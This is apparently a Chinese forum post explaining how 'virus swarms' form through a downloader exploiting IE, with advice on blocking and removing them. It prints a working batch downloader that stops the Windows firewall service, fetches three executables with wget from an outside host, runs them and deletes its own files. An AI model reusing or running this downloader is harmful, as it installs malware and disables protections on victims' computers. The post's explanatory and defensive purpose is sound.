关于病毒群
最近看baohe和阳光写了关于病毒群的问题。其实这个问题早就存在,自从去年8月份把,记不清楚了,那时候就会有病毒群的问题。但是病毒群中病毒数量很少。
到现在这个方法是越演越烈,害得我不敢用本级搜索东西,怕中病毒群。这东西处理起来太麻烦,而且不容易处理干净。只能拿虚拟机,还经常中毒到虚拟机系统不能正常启动。最后就Ghost了。………………
说说病毒群怎么形成的吧。这个还是比较关键的。病毒群一般都是又10到15种病毒组成,但是这些病毒不能一下子下载到计算机中,会引起大家的怀疑,也会出现各种问题,那么就要有一个下载器,专门下载病毒。这个下载器一般都是通过IE的漏洞,下载下来的,然后就可以工作了,分批一步一步下载各种病毒群中的病毒。这就是病毒群的简单形成方法。
以下是一种批处理类型下载器的源码:
@echo off
net stop sharedaccess
del down.exe /删除down.exe文件/
del game.exe /删除game.exe文件/
del bank.exe /删除bank.exe文件/
wget.exe http://www.bartenderofchina.com/gz/down.exe /下载病毒文件1/
wget.exe http://www.bartenderofchina.com/gz/game.exe /下载病毒文件2/
wget.exe http://www.bartenderofchina.com/gz/bank.exe /下载病毒文件3/
down.exe /运行病毒文件/
game.exe
bank.exe
exit /结束/
del up.vbs /清理下载器文件/
del update.bat
del wget.exe
这个只是其中一段bat的代码,当然注释可能有不对的地方。多多提出。
我们需要的是堵住这个源头,那么怎么堵住呢。利用一些监视程序,设置规则。baohe使用的是SSM,瑞星有IE防漏墙(虽然很…………,但是还是可以防住50%的下载器)
说了这么多,我在说说关于病毒群的删除,这个是一只讨论的问题,我认为病毒群的删除还要具体问题具体分析,像baohe和阳光那两篇文章只能针对一部分病毒群,但是还没有写全面,现在各种各样的病毒群出现,无法一一写明,只能扫描SRE日志,然后发布到论坛,来让高手给出解决方法。如果自己试验,一定要找好所有病毒文件,遗留一个就有可能全部病毒回来,很麻烦。
